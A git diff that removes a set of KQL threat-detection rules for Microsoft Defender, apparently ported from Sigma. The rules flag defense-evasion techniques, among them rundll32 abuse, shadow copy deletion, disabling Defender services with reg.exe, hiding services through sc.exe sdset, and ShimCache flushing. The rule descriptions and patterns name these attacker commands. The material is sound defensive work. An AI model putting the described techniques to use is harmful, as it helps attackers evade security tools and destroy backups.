-| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql b/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql
deleted file mode 100644
index 11cc1e9b..00000000
--- a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql b/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql
deleted file mode 100644
index 756a6a72..00000000
--- a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
-// Date: 2022/04/28
-// Level: medium
-// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
-// Tags: attack.t1218.011, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Internet_Connection.kql b/Defense Evasion/Rundll32_Internet_Connection.kql
deleted file mode 100644
index 2acd0757..00000000
--- a/Defense Evasion/Rundll32_Internet_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql b/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql
deleted file mode 100644
index 0e6f7b7c..00000000
--- a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_ROM_
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_UNC_Path_Execution.kql b/Defense Evasion/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Defense Evasion/Rundll32_UNC_Path_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/SCR_File_Write_Event.kql b/Defense Evasion/SCR_File_Write_Event.kql
deleted file mode 100644
index 037d4717..00000000
--- a/Defense Evasion/SCR_File_Write_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/04/27
-// Level: medium
-// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index 94cb9201..00000000
--- a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql b/Defense Evasion/ScreenSaver_Registry_Key_Set.kql
deleted file mode 100644
index c98e2ab2..00000000
--- a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/04
-// Level: medium
-// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql b/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql
deleted file mode 100644
index ca2477a7..00000000
--- a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/06/15
-// Level: medium
-// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql b/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql
deleted file mode 100644
index 620fe02e..00000000
--- a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql b/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 0e33ccc2..00000000
--- a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
-// Date: 2021/07/14
-// Level: high
-// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql
deleted file mode 100644
index 6fbf2187..00000000
--- a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/05
-// Level: high
-// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
-This behavior has been observed in-the-wild by different threat actors.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql
deleted file mode 100644
index d968330c..00000000
--- a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/02/05
-// Level: medium
-// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
-These files are used by the "iexpress.exe" utility in order to create self extracting packages.
-Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql b/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql
deleted file mode 100644
index 2b8c5e74..00000000
--- a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detect the creation of a service with a service binary located in a suspicious directory
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services") or ((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services")) and (not((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index b4ed8585..00000000
--- a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql b/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql b/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql
deleted file mode 100644
index fd22f26f..00000000
--- a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql b/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Defense Evasion/ShimCache_Flush.kql b/Defense Evasion/ShimCache_Flush.kql
deleted file mode 100644
index f8a6db43..00000000
--- a/Defense Evasion/ShimCache_Flush.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/01
-// Level: high
-// Description: Detects actions that clear the local ShimCache and remove forensic evidence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/Defense Evasion/Sideloading_Link.EXE.kql b/Defense Evasion/Sideloading_Link.EXE.kql
deleted file mode 100644
index 86e7b9e1..00000000
--- a/Defense Evasion/Sideloading_Link.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: medium
-// Description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not((InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql b/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql
deleted file mode 100644
index e86795a7..00000000
--- a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/16
-// Level: medium
-// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspect_Svchost_Activity.kql b/Defense Evasion/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Defense Evasion/Suspect_Svchost_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
